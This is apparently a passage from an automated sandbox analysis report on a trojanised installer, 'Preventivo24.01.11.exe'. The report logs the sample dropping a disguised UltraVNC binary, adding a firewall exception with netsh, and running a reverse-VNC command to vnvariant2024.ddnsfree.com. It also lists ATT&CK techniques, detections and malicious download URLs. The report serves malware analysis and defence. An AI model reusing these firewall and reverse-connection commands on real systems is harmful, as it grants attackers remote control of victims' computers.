Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="			Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,

0_2_00FB9280

Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop

Source: C:\Games\viewer.exe

Code function: 6_2_00635448 cpuid

6_2_00635448

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	0_2_00FEB480
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	6_2_0064F04D
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_0064F173
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	6_2_0064F279
Source: C:\Games\viewer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_0064F348
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,___wcsnicmp_ascii,	6_2_0063433F
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	6_2_006483B3
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	6_2_0063440A
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	6_2_0064ECD4
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	6_2_0064EC89
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	6_2_0064ED6F
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_0064EDFA
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	6_2_00647E3A

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW,

0_2_01003AD0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF6820 GetLocalTime,

0_2_00FF6820

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,

0_2_01002440

Source: C:\Games\viewer.exe

Code function: 6_2_00648AB4 _free,GetTimeZoneInformation,

6_2_00648AB4

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

0_2_00E87AA0

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Spearphishing Link	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
1 Valid Accounts	3 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	1 Replication Through Removable Media	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	1 Defacement	Domains	Credentials
1 Replication Through Removable Media	112 Command and Scripting Interpreter	1 Bootkit	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	1 Access Token Manipulation	1 Timestomp	NTDS	5 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Remote Access Software			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	13 Process Injection	1 DLL Side-Loading	LSA Secrets	37 System Information Discovery	SSH	Keylogging	Scheduled Transfer	3 Non-Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Data Transfer Size Limits	14 Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	41 Security Software Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Preventivo24.01.11.exe	8%	ReversingLabs
Preventivo24.01.11.exe	17%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6E82.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	8%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://forum.uvnc.comvncMenu::WndProc	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://www.uvnc.comhttps://forum.uvnc.comnet	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
https://www.uvnc.comcmd	0%	Avira URL Cloud	safe
http://java.sun.com/products/plugin/index.html#download	0%	Avira URL Cloud	safe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.example.com	93.184.216.34	true	false		high
vnvariant2024.ddnsfree.com	140.228.29.110	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.example.com/download/updates.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pdf-tools.com	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://www.uvnc.com	taskhost.exe.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://.css	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://forum.uvnc.com	taskhost.exe.0.dr	false		high
https://www.uvnc.comcmd	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false		high
https://www.thawte.com/cps0/	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://forum.uvnc.comvncMenu::WndProc	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	low
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://www.thawte.com/repository0W	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.advancedinstaller.com	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.uvnc.comhttps://forum.uvnc.comnet	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://java.sun.com/products/plugin/index.html#download	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://.jpg	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.202.204.11	unknown	United States	14618	AMAZON-AESUS	false
93.184.216.34	www.example.com	European Union	15133	EDGECASTUS	false
23.54.200.159	unknown	United States	16625	AKAMAI-ASUS	false
140.228.29.110	vnvariant2024.ddnsfree.com	United States	600	OARNET-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379424
Start date and time:	2024-01-23 12:17:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Preventivo24.01.11.exe
Detection:	MAL
Classification:	mal76.rans.troj.evad.winEXE@110/77@8/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 60% Number of executed functions: 97 Number of non-executed functions: 147
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.63.204.182, 172.64.41.3, 162.159.61.3, 23.55.62.18, 23.55.62.67, 23.47.204.60, 23.47.204.78, 23.47.204.62, 23.47.204.51, 23.47.204.71, 23.47.204.8, 23.47.204.33, 23.34.82.78, 23.34.82.70
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.202.204.11	Lista_de_pedidos-617262-252362.xls	Get hash	malicious	Unknown	Browse
	m-vergeer.ternair@outlook.com sent you files via sendbig.com.msg	Get hash	malicious	Unknown	Browse
	https://irp.cdn-website.com/8342910d/files/uploaded/28249193458.pdf	Get hash	malicious	Unknown	Browse
	https://5.imimg.com/data5/MY/Rfq/2023/8/331030482/OB/RZ/OQ/132828970/49241002153.pdf	Get hash	malicious	Unknown	Browse
	RFQ_No._8202023.xla.xlsx	Get hash	malicious	Unknown	Browse
	http://img1.wsimg.com/blobby/go/94e1955e-c7d2-4e11-a6ac-7a5ec652d6cd/downloads/90285909290.pdf	Get hash	malicious	Unknown	Browse
	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6InRhbmRhcnRzQHNtZWV0cy12ZXJtZWlyLmJlIiwicmVxdWVzdElkIjoiOWIxNGRiNjMtZjM3OS00NzQ1LTQ2N2YtZTY1ODE1NTQ3MDI2IiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6QVA6NjFjOTAzMTgtYmE3Zi00ZjMzLWI4YTctZDE1YzVmZTY0ZTEzIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.hXL-219EGgku2uepuRe3vRYvtIfcSD4pBn9ML8LmEOaK4iNvI0v6dcYxZMHpuaSyRT1OE2X5xWymmMNRtOwyFQ	Get hash	malicious	HTMLPhisher	Browse
	download.zip	Get hash	malicious	HTMLPhisher	Browse
	http://1drv.ms/b/s!AghnLzOtLh6Rb_R1ktHOGkIySh8	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/s!Arsg2VA8qyWCacPV3ceYePuhVBk	Get hash	malicious	Unknown	Browse
93.184.216.34	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	invoice.exe	Get hash	malicious	Unknown	Browse	example.com/invoice.png
	invoice.exe	Get hash	malicious	Unknown	Browse	example.com/invoice.png
	sPQFAZC1qu.exe	Get hash	malicious	Unknown	Browse	example.com/logo.png
	https://swailemmarket.com/09/me.php/?email=mkpublicitario	Get hash	malicious	Phisher	Browse	example.com/favicon.ico
	PO#300637600010.pdf.exe	Get hash	malicious	Unknown	Browse	example.com/Cpxrobfbi.bmp
23.54.200.159	0IY4t0eqn2.exe	Get hash	malicious	DarkTortilla, RedLine	Browse
	python.exe	Get hash	malicious	CobaltStrike	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
140.228.29.110	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
140.228.29.110	Fatturation110124.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.example.com	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://89.190.156.10/w.sh	Get hash	malicious	Unknown	Browse	93.184.216.34
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://93.123.85.79/fuckjewishpeople.x86	Get hash	malicious	Gafgyt, Mirai	Browse	93.184.216.34
	http://84.54.51.74/SBIDIOT/x86	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://45.95.147.236/download/redtail.x86_64	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://114.67.217.170/bins/sora.x86	Get hash	malicious	Unknown	Browse	93.184.216.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EDGECASTUS	https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmM	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://r20.rs6.net/tn.jsp?f=001YH-7ZZwZf7vdTuy8dA-Lrgcj-RWTq3YSoVohjMwglnhROJ-nqA7TO7-KdBpZBl6RaLh5o0DSlL3SoDP7qpv4LsjHVxt3Zzvw1KN163kNMN-iXLg07xWzu4hMlToFknIyjffPrubFycvA3YBCe7UEIw==&c=Yks7_GJ0450wjzHe24SAzoXRzl2-u4T4FpfxJamuYFeWFIrqepMI7Q==&ch=WTLp04fpQb3-V9z92yhgE0Y-Y6wimMaEQRH3SzFk5jbBN1xPF_QeGA==	Get hash	malicious	Unknown	Browse	72.21.91.66
	https://bafkreihnbfu4b55y5i6veo6i34vpad7c6uzbf5dqnxud5e2udieuscrgnm.ipfs.cf-ipfs.com/	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
